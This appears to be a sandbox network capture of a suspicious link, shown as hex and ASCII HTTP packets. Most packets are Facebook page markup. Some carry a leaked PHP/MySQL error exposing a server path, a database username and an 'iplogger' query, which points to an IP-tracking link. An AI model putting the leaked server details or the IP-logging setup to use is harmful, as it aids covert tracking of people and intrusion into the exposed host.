2022-10-07 13:59:00 UTC	316	IN	Data Raw: 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 26 23 30 33 39 3b 25 32 30 6c 69 6d 69 74 25 32 30 30 2c 31 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 32 30 63 6f 6c 6f 72 3d 25 32 32 25 32 33 66 66 30 30 30 30 25 32 32 25 33 45 25 35 42 54 45 50 25 32 30 53 54 4f 50 25 35 44 25 33 43 2f 66 6f 6e 74 25 33 45 25 30 41 25 33 43 2f 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 2f 66 6f 6e 74 25 33 45 3f 5f 66 62 5f 6e 6f 73 63 72 69 70 74 3d 31 22 20 2f 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 6e 69 66 65 73 74 22 20 Data Ascii: f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E?_fb_noscript=1" /></noscript><link rel="manifest"
2022-10-07 13:59:00 UTC	317	IN	Data Raw: 25 32 32 25 33 45 25 30 41 25 33 43 62 25 33 45 31 30 34 35 25 32 30 2d 25 32 30 41 63 63 65 73 73 25 32 30 64 65 6e 69 65 64 25 32 30 66 6f 72 25 32 30 75 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 73 65 6c 65 63 74 25 32 30 69 70 6c 6f 67 67 65 72 25 32 30 66 72 6f 6d 25 32 30 74 5f 63 68 61 6e 6e 65 6c 73 25 32 30 77 68 65 72 65 25 32 30 6e 61 6d 65 3d 26 23 30 33 39 3b 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 Data Ascii: %22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457
2022-10-07 13:59:00 UTC	319	IN	Data Raw: 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 73 65 6c 65 63 74 25 32 30 69 70 6c 6f 67 67 65 72 25 32 30 66 72 6f 6d 25 32 30 74 5f 63 68 61 6e 6e 65 6c 73 25 32 30 77 68 65 72 65 25 32 30 6e 61 6d 65 3d 26 23 30 33 39 3b 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 26 23 30 33 39 3b 25 32 30 6c 69 6d 69 74 25 32 30 30 2c 31 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 32 30 63 6f 6c 6f 72 3d 25 32 32 25 32 33 66 66 Data Ascii: 64;'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff
2022-10-07 13:59:00 UTC	320	IN	Data Raw: 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 6f 42 2f 79 58 67 33 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 6f 2f 6c 2f 30 2c 63 72 6f 73 73 2f 58 48 77 75 41 5f 5f 34 32 41 66 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 34 42 47 54 6d 43 37 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 Data Ascii: =Ij3Wp8lg5Kz" data-bootloader-hash="oB/yXg3" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yo/l/0,cross/XHwuA__42Af.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="4BGTmC7" /><link type="text/css" rel="stylesheet" h
2022-10-07 13:59:00 UTC	322	IN	Data Raw: 53 74 2d 52 78 71 32 63 22 7d 2c 22 38 31 32 36 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 34 55 37 71 47 30 36 70 39 73 46 36 75 38 55 69 41 22 7d 2c 22 36 37 36 38 33 38 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 6e 4e 31 65 68 54 39 79 71 2d 32 71 36 6b 48 49 22 7d 2c 22 31 32 31 37 31 35 37 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 42 37 59 6d 6c 6c 4f 73 41 72 6e 4b 36 74 59 38 22 7d 2c 22 31 35 35 34 38 32 37 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 37 7a 75 65 47 4c 68 47 6f 30 63 54 35 78 44 6d 45 22 7d 2c 22 31 37 33 38 34 38 36 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 Data Ascii: St-Rxq2c"},"8126":{"result":false,"hash":"AT4U7qG06p9sF6u8UiA"},"676838":{"result":false,"hash":"AT6nN1ehT9yq-2q6kHI"},"1217157":{"result":false,"hash":"AT6B7YmllOsArnK6tY8"},"1554827":{"result":false,"hash":"AT7zueGLhGo0cT5xDmE"},"1738486":{"result":fals
2022-10-07 13:59:00 UTC	323	IN	Data Raw: 78 22 7d 2c 22 77 64 22 3a 7b 22 74 22 3a 36 30 34 38 30 30 2c 22 73 22 3a 22 4c 61 78 22 7d 2c 22 78 2d 72 65 66 65 72 65 72 22 3a 7b 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 78 2d 73 72 63 22 3a 7b 22 74 22 3a 31 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 7d 2c 32 31 30 34 5d 2c 5b 22 43 75 72 72 65 6e 74 43 6f 6d 6d 75 6e 69 74 79 49 6e 69 74 69 61 6c 44 61 74 61 22 2c 5b 5d 2c 7b 7d 2c 34 39 30 5d 2c 5b 22 43 75 72 72 65 6e 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 2c 5b 5d 2c 7b 22 66 61 63 65 62 6f 6f 6b 64 6f 74 63 6f 6d 22 3a 74 72 75 65 2c 22 6d 65 73 73 65 6e 67 65 72 64 6f 74 63 6f 6d 22 3a 66 61 6c 73 65 2c 22 77 6f 72 6b 70 6c 61 63 65 64 6f 74 63 6f 6d 22 3a 66 61 6c 73 65 2c 22 69 6e 73 74 61 67 72 61 6d 64 6f 74 63 6f 6d 22 3a 66 61 6c 73 65 7d 2c 38 Data Ascii: x"},"wd":{"t":604800,"s":"Lax"},"x-referer":{"s":"None"},"x-src":{"t":1,"s":"None"}},2104],["CurrentCommunityInitialData",[],{},490],["CurrentEnvironment",[],{"facebookdotcom":true,"messengerdotcom":false,"workplacedotcom":false,"instagramdotcom":false},8
2022-10-07 13:59:00 UTC	325	IN	Data Raw: 2c 22 73 68 6f 75 6c 64 5f 72 61 6e 64 6f 6d 69 7a 65 22 3a 66 61 6c 73 65 7d 2c 32 31 31 31 5d 2c 5b 22 55 73 65 72 41 67 65 6e 74 44 61 74 61 22 2c 5b 5d 2c 7b 22 62 72 6f 77 73 65 72 41 72 63 68 69 74 65 63 74 75 72 65 22 3a 22 36 34 22 2c 22 62 72 6f 77 73 65 72 46 75 6c 6c 56 65 72 73 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 62 72 6f 77 73 65 72 4d 69 6e 6f 72 56 65 72 73 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 62 72 6f 77 73 65 72 4e 61 6d 65 22 3a 22 55 6e 6b 6e 6f 77 6e 22 2c 22 62 72 6f 77 73 65 72 56 65 72 73 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 64 65 76 69 63 65 4e 61 6d 65 22 3a 22 55 6e 6b 6e 6f 77 6e 22 2c 22 65 6e 67 69 6e 65 4e 61 6d 65 22 3a 22 55 6e 6b 6e 6f 77 6e 22 2c 22 65 6e 67 69 6e 65 56 65 72 73 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 70 6c 61 74 66 6f 72 Data Ascii: ,"should_randomize":false},2111],["UserAgentData",[],{"browserArchitecture":"64","browserFullVersion":null,"browserMinorVersion":null,"browserName":"Unknown","browserVersion":null,"deviceName":"Unknown","engineName":"Unknown","engineVersion":null,"platfor
2022-10-07 13:59:00 UTC	326	IN	Data Raw: 49 5f 53 52 54 5f 43 4f 52 45 5f 4c 4f 47 47 45 52 22 2c 22 53 52 54 5f 42 41 4e 5a 41 49 5f 53 52 54 5f 4d 41 49 4e 5f 4c 4f 47 47 45 52 22 2c 22 57 4f 52 4b 50 4c 41 43 45 5f 50 4c 41 54 46 4f 52 4d 5f 53 45 43 55 52 45 5f 41 50 50 53 5f 4d 41 49 4c 42 4f 58 45 53 22 2c 22 50 4f 43 4b 45 54 5f 4d 4f 4e 53 54 45 52 53 5f 55 50 44 41 54 45 5f 4e 41 4d 45 22 2c 22 49 43 5f 44 49 53 41 42 4c 45 5f 4d 45 52 47 45 5f 54 4f 4f 4c 5f 46 45 45 44 5f 43 48 45 43 4b 5f 46 4f 52 5f 52 45 50 4c 41 43 45 5f 53 43 48 45 44 55 4c 45 22 2c 22 41 44 53 5f 45 50 44 5f 49 4d 50 41 43 54 45 44 5f 41 44 56 45 52 54 49 53 45 52 5f 4d 49 47 52 41 54 45 5f 58 43 4f 4e 54 52 4f 4c 4c 45 52 22 2c 22 52 45 43 52 55 49 54 49 4e 47 5f 43 41 4e 44 49 44 41 54 45 5f 50 4f 52 54 41 4c Data Ascii: I_SRT_CORE_LOGGER","SRT_BANZAI_SRT_MAIN_LOGGER","WORKPLACE_PLATFORM_SECURE_APPS_MAILBOXES","POCKET_MONSTERS_UPDATE_NAME","IC_DISABLE_MERGE_TOOL_FEED_CHECK_FOR_REPLACE_SCHEDULE","ADS_EPD_IMPACTED_ADVERTISER_MIGRATE_XCONTROLLER","RECRUITING_CANDIDATE_PORTAL
2022-10-07 13:59:00 UTC	328	IN	Data Raw: 2c 22 67 72 61 70 68 69 74 65 2e 69 6e 73 74 61 67 72 61 6d 2e 63 6f 6d 22 2c 22 77 77 77 2e 6b 66 63 2e 63 6f 2e 74 68 22 2c 22 6c 65 61 72 6e 2e 70 61 6e 74 68 65 6f 6e 2e 69 6f 22 2c 22 77 77 77 2e 6c 61 6e 64 6d 61 72 6b 73 68 6f 70 73 2e 69 6e 22 2c 22 77 77 77 2e 6e 63 6c 2e 63 6f 6d 22 2c 22 73 30 2e 77 70 2e 63 6f 6d 22 2c 22 77 77 77 2e 74 61 74 61 63 6c 69 71 2e 63 6f 6d 22 2c 22 62 73 2e 73 65 72 76 69 6e 67 2d 73 79 73 2e 63 6f 6d 22 2c 22 6b 6f 68 6c 73 2e 63 6f 6d 22 2c 22 6c 61 7a 61 64 61 2e 63 6f 2e 74 68 22 2c 22 78 67 34 6b 65 6e 2e 63 6f 6d 22 2c 22 74 65 63 68 6e 6f 70 61 72 6b 2e 72 75 22 2c 22 6f 66 66 69 63 65 64 65 70 6f 74 2e 63 6f 6d 2e 6d 78 22 2c 22 62 65 73 74 62 75 79 2e 63 6f 6d 2e 6d 78 22 2c 22 62 6f 6f 6b 69 6e 67 2e 63 Data Ascii: ,"graphite.instagram.com","www.kfc.co.th","learn.pantheon.io","www.landmarkshops.in","www.ncl.com","s0.wp.com","www.tatacliq.com","bs.serving-sys.com","kohls.com","lazada.co.th","xg4ken.com","technopark.ru","officedepot.com.mx","bestbuy.com.mx","booking.c
2022-10-07 13:59:00 UTC	329	IN	Data Raw: 2f 22 3a 22 28 5b 2e 2c 21 3f 5c 5c 73 5d 7c 24 29 22 7d 2c 22 70 61 74 74 65 72 6e 73 22 3a 7b 22 5c 2f 5c 75 30 30 30 31 28 2e 2a 29 28 27 7c 26 23 30 33 39 3b 29 73 5c 75 30 30 30 31 28 3f 3a 27 7c 26 23 30 33 39 3b 29 73 28 2e 2a 29 5c 2f 22 3a 22 5c 75 30 30 30 31 24 31 24 32 73 5c 75 30 30 30 31 24 33 22 2c 22 5c 2f 5f 5c 75 30 30 30 31 28 5b 5e 5c 75 30 30 30 31 5d 2a 29 5c 75 30 30 30 31 5c 2f 22 3a 22 6a 61 76 61 73 63 72 69 70 74 22 7d 7d 2c 31 34 39 36 5d 2c 5b 22 49 6e 74 6c 56 69 65 77 65 72 43 6f 6e 74 65 78 74 22 2c 5b 5d 2c 7b 22 47 45 4e 44 45 52 22 3a 33 2c 22 72 65 67 69 6f 6e 61 6c 4c 6f 63 61 6c 65 22 3a 6e 75 6c 6c 7d 2c 37 37 32 5d 2c 5b 22 4e 75 6d 62 65 72 46 6f 72 6d 61 74 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 64 65 63 69 6d 61 Data Ascii: /":"([.,!?\\s]\|$)"},"patterns":{"\/\u0001(.)('\|')s\u0001(?:'\|')s(.)\/":"\u0001$1$2s\u0001$3","\/_\u0001([^\u0001]*)\u0001\/":"javascript"}},1496],["IntlViewerContext",[],{"GENDER":3,"regionalLocale":null},772],["NumberFormatConfig",[],{"decima
2022-10-07 13:59:00 UTC	331	IN	Data Raw: 65 78 69 74 64 73 69 74 65 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 62 61 6c 61 6e 63 65 5c 2f 70 69 78 65 6c 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 62 61 6c 61 6e 63 65 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 62 61 6c 61 6e 63 65 5c 2f 63 61 72 72 69 65 72 5f 6c 61 6e 64 69 6e 67 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 66 6c 65 78 5c 2f 6c 6f 67 67 69 6e 67 5c 2f 22 3a 31 2c 22 5c 2f 74 72 22 3a 31 2c 22 5c 2f 74 72 5c 2f 22 3a 31 2c 22 5c 2f 73 65 6d 5f 63 61 6d 70 61 69 67 6e 73 5c 2f 73 65 6d 5f 70 69 78 65 6c 5f 74 65 73 74 5c 2f 22 3a 31 2c 22 5c 2f 62 6f 6f 6b 6d 61 72 6b 73 5c 2f 66 6c 79 6f 75 74 5c 2f 62 6f 64 79 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 73 75 62 6e 6f 5c 2f 22 3a 31 2c 22 5c 2f 63 6f 6e 66 69 72 6d 65 6d 61 69 Data Ascii: exitdsite":1,"\/zero\/balance\/pixel\/":1,"\/zero\/balance\/":1,"\/zero\/balance\/carrier_landing\/":1,"\/zero\/flex\/logging\/":1,"\/tr":1,"\/tr\/":1,"\/sem_campaigns\/sem_pixel_test\/":1,"\/bookmarks\/flyout\/body\/":1,"\/zero\/subno\/":1,"\/confirmemai
2022-10-07 13:59:00 UTC	332	IN	Data Raw: 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 73 6d 73 5c 2f 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 61 5c 2f 63 68 61 6e 6e 65 6c 5c 2f 72 65 63 6f 6e 6e 65 63 74 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 61 5c 2f 6e 75 78 5c 2f 77 69 7a 61 72 64 5c 2f 6e 61 76 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 61 70 70 72 65 67 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 62 69 72 74 68 64 61 79 5f 68 65 6c 70 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 63 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 63 6f 6e 66 69 72 6d 65 6d 61 69 6c 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 63 72 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 6c 6f 67 69 6e 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 72 2e 70 68 70 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f Data Ascii: 1,"\/upsell\/sms\/":1,"\/wap\/a\/channel\/reconnect.php":1,"\/wap\/a\/nux\/wizard\/nav.php":1,"\/wap\/appreg.php":1,"\/wap\/birthday_help.php":1,"\/wap\/c.php":1,"\/wap\/confirmemail.php":1,"\/wap\/cr.php":1,"\/wap\/login.php":1,"\/wap\/r.php":1,"\/zero\/
2022-10-07 13:59:00 UTC	334	IN	Data Raw: 3a 22 32 35 36 32 38 31 30 34 30 35 35 38 22 2c 22 65 6e 61 62 6c 65 5f 62 6c 61 64 65 72 75 6e 6e 65 72 22 3a 66 61 6c 73 65 2c 22 65 6e 61 62 6c 65 5f 61 63 6b 22 3a 74 72 75 65 2c 22 70 75 73 68 5f 70 68 61 73 65 22 3a 22 43 33 22 2c 22 65 6e 61 62 6c 65 5f 6f 62 73 65 72 76 65 72 22 3a 66 61 6c 73 65 2c 22 65 6e 61 62 6c 65 5f 64 61 74 61 6c 6f 73 73 5f 74 69 6d 65 72 22 3a 66 61 6c 73 65 2c 22 65 6e 61 62 6c 65 5f 66 61 6c 6c 62 61 63 6b 5f 66 6f 72 5f 62 72 22 3a 74 72 75 65 2c 22 66 69 78 5f 62 72 5f 69 6e 69 74 5f 72 63 22 3a 66 61 6c 73 65 2c 22 71 75 65 75 65 5f 61 63 74 69 76 61 74 69 6f 6e 5f 65 78 70 65 72 69 6d 65 6e 74 22 3a 66 61 6c 73 65 2c 22 6d 61 78 5f 64 65 6c 61 79 5f 62 72 5f 71 75 65 75 65 22 3a 36 30 30 30 30 2c 22 6d 61 78 5f 64 Data Ascii: :"256281040558","enable_bladerunner":false,"enable_ack":true,"push_phase":"C3","enable_observer":false,"enable_dataloss_timer":false,"enable_fallback_for_br":true,"fix_br_init_rc":false,"queue_activation_experiment":false,"max_delay_br_queue":60000,"max_d
2022-10-07 13:59:00 UTC	335	IN	Data Raw: 72 76 61 6c 42 6c 75 65 22 2c 22 41 61 30 4f 4a 62 36 74 4e 47 4d 64 31 6c 37 62 7a 6e 64 6b 37 45 6b 45 56 61 39 55 48 4a 51 36 67 33 42 50 32 37 5a 47 78 48 61 6e 7a 71 6a 5f 33 4b 46 6b 47 49 74 45 6b 6e 6e 6c 39 6a 53 47 41 41 59 76 6a 61 45 54 64 43 44 54 59 6e 30 67 4b 63 77 42 33 69 74 30 43 75 63 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 31 38 33 35 37 39 22 2c 5b 22 49 6e 6c 69 6e 65 46 62 74 52 65 73 75 6c 74 49 6d 70 6c 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 49 6e 6c 69 6e 65 46 62 74 52 65 73 75 6c 74 49 6d 70 6c 22 2c 22 41 61 30 4f 4a 62 36 74 4e 47 4d 64 31 6c 37 62 7a 6e 64 6b 37 45 6b 45 56 61 39 55 48 4a 51 36 67 33 42 50 32 37 5a 47 78 48 61 6e 7a 71 6a 5f 33 4b 46 6b 47 49 74 45 6b 6e 6e 6c 39 6a 53 47 41 41 59 76 6a 61 45 54 64 43 44 Data Ascii: rvalBlue","Aa0OJb6tNGMd1l7bzndk7EkEVa9UHJQ6g3BP27ZGxHanzqj_3KFkGItEknnl9jSGAAYvjaETdCDTYn0gKcwB3it0Cuc"]},-1],["cr:1183579",["InlineFbtResultImpl"],{"__rc":["InlineFbtResultImpl","Aa0OJb6tNGMd1l7bzndk7EkEVa9UHJQ6g3BP27ZGxHanzqj_3KFkGItEknnl9jSGAAYvjaETdCD
2022-10-07 13:59:00 UTC	337	IN	Data Raw: 7b 7d 2c 32 33 39 33 5d 2c 5b 22 49 6e 74 6c 43 75 72 72 65 6e 74 4c 6f 63 61 6c 65 22 2c 5b 5d 2c 7b 22 63 6f 64 65 22 3a 22 65 6e 5f 55 53 22 7d 2c 35 39 35 34 5d 2c 5b 22 55 53 49 44 4d 65 74 61 64 61 74 61 22 2c 5b 5d 2c 7b 22 62 72 6f 77 73 65 72 5f 69 64 22 3a 22 3f 22 2c 22 74 61 62 5f 69 64 22 3a 22 22 2c 22 70 61 67 65 5f 69 64 22 3a 22 50 72 6a 64 79 75 63 31 68 79 74 79 66 6e 22 2c 22 74 72 61 6e 73 69 74 69 6f 6e 5f 69 64 22 3a 30 2c 22 76 65 72 73 69 6f 6e 22 3a 36 7d 2c 35 38 38 38 5d 2c 5b 22 63 72 3a 36 38 36 22 2c 5b 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 6e 75 6c 6c 2c 22 41 61 32 76 34 37 61 7a 73 66 6d 47 34 69 72 33 54 69 53 38 79 56 6f 55 67 61 35 76 36 4d 54 77 35 37 6d 4f 6f 46 6e 71 54 65 30 6e 39 77 39 52 66 6a 42 49 33 75 56 62 6f 33 Data Ascii: {},2393],["IntlCurrentLocale",[],{"code":"en_US"},5954],["USIDMetadata",[],{"browser_id":"?","tab_id":"","page_id":"Prjdyuc1hytyfn","transition_id":0,"version":6},5888],["cr:686",[],{"__rc":[null,"Aa2v47azsfmG4ir3TiS8yVoUga5v6MTw57mOoFnqTe0n9w9RfjBI3uVbo3
2022-10-07 13:59:00 UTC	338	IN	Data Raw: 6f 20 46 61 63 65 62 6f 6f 6b 20 68 6f 6d 65 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 62 5f 6c 6f 67 6f 20 69 6d 67 20 73 70 5f 6f 74 31 74 35 59 6a 59 4c 33 73 20 73 78 5f 39 31 36 37 64 36 22 3e 3c 75 3e 46 61 63 65 62 6f 6f 6b 3c 2f 75 3e 3c 2f 69 3e 3c 2f 61 3e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 79 6c 34 20 72 66 6c 6f 61 74 20 5f 6f 68 66 22 20 64 61 74 61 2d 74 65 73 74 69 64 3d 22 72 6f 79 61 6c 5f 6c 6f 67 69 6e 5f 66 6f 72 6d 22 3e 3c 61 20 68 72 65 66 3d 22 2f 22 20 69 64 3d 22 75 5f 30 5f 30 5f 51 4c 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 77 68 69 74 65 22 3e 4a 6f 69 6e 20 6f 72 20 4c 6f 67 20 49 6e 74 6f 20 46 61 63 65 62 6f 6f 6b 20 e2 80 89 20 3c 69 20 63 6c 61 73 73 3d 22 5f 33 Data Ascii: o Facebook home"><i class="fb_logo img sp_ot1t5YjYL3s sx_9167d6"><u>Facebook</u></i></a></h1></div><div class="_yl4 rfloat _ohf" data-testid="royal_login_form"><a href="/" id="u_0_0_QL"><span style="color: white">Join or Log Into Facebook <i class="_3
2022-10-07 13:59:00 UTC	339	IN	Data Raw: 65 3d 22 74 69 6d 65 7a 6f 6e 65 22 20 76 61 6c 75 65 3d 22 22 20 69 64 3d 22 75 5f 30 5f 33 5f 34 4f 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 6e 61 6d 65 3d 22 6c 67 6e 64 69 6d 22 20 76 61 6c 75 65 3d 22 22 20 69 64 3d 22 75 5f 30 5f 34 5f 7a 79 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 6c 67 6e 72 6e 64 22 20 76 61 6c 75 65 3d 22 30 36 35 39 30 30 5f 68 4d 35 55 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 6c 67 6e 6a 73 22 20 6e 61 6d 65 3d 22 6c 67 6e 6a 73 22 20 76 61 6c 75 65 3d 22 6e 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 Data Ascii: e="timezone" value="" id="u_0_3_4O" /><input type="hidden" autocomplete="off" name="lgndim" value="" id="u_0_4_zy" /><input type="hidden" name="lgnrnd" value="065900_hM5U" /><input type="hidden" id="lgnjs" name="lgnjs" value="n" /><input type="hidden" aut
2022-10-07 13:59:00 UTC	341	IN	Data Raw: 64 69 76 20 63 6c 61 73 73 3d 22 70 76 6c 20 5f 34 2d 64 6f 22 3e 3c 68 32 20 63 6c 61 73 73 3d 22 5f 34 2d 64 70 22 3e 54 68 69 73 20 70 61 67 65 20 69 73 6e 26 23 30 33 39 3b 74 20 61 76 61 69 6c 61 62 6c 65 3c 2f 68 32 3e 3c 68 33 20 63 6c 61 73 73 3d 22 5f 34 2d 64 71 22 3e 54 68 65 20 6c 69 6e 6b 20 79 6f 75 20 66 6f 6c 6c 6f 77 65 64 20 6d 61 79 20 62 65 20 62 72 6f 6b 65 6e 2c 20 6f 72 20 74 68 65 20 70 61 67 65 20 6d 61 79 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2e 3c 2f 68 33 3e 3c 69 20 63 6c 61 73 73 3d 22 6d 76 6c 20 69 6d 67 20 73 70 5f 6f 74 31 74 35 59 6a 59 4c 33 73 20 73 78 5f 37 37 38 38 63 30 22 3e 3c 2f 69 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 62 6c 20 70 76 6c 20 5f 34 2d 64 72 20 66 73 6d 20 66 77 6e 20 66 63 67 22 Data Ascii: div class="pvl _4-do"><h2 class="_4-dp">This page isn't available</h2><h3 class="_4-dq">The link you followed may be broken, or the page may have been removed.</h3><i class="mvl img sp_ot1t5YjYL3s sx_7788c0"></i><div class="mbl pvl _4-dr fsm fwn fcg"
2022-10-07 13:59:00 UTC	342	IN	Data Raw: 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 34 37 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 25 33 45 57 61 72 6e 69 6e 67 25 33 43 2f 62 25 33 45 3a 25 32 30 25 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 25 32 30 41 63 63 65 73 73 25 32 30 64 65 6e 69 65 64 25 32 30 66 6f 72 25 32 30 75 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 Data Ascii: wroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20
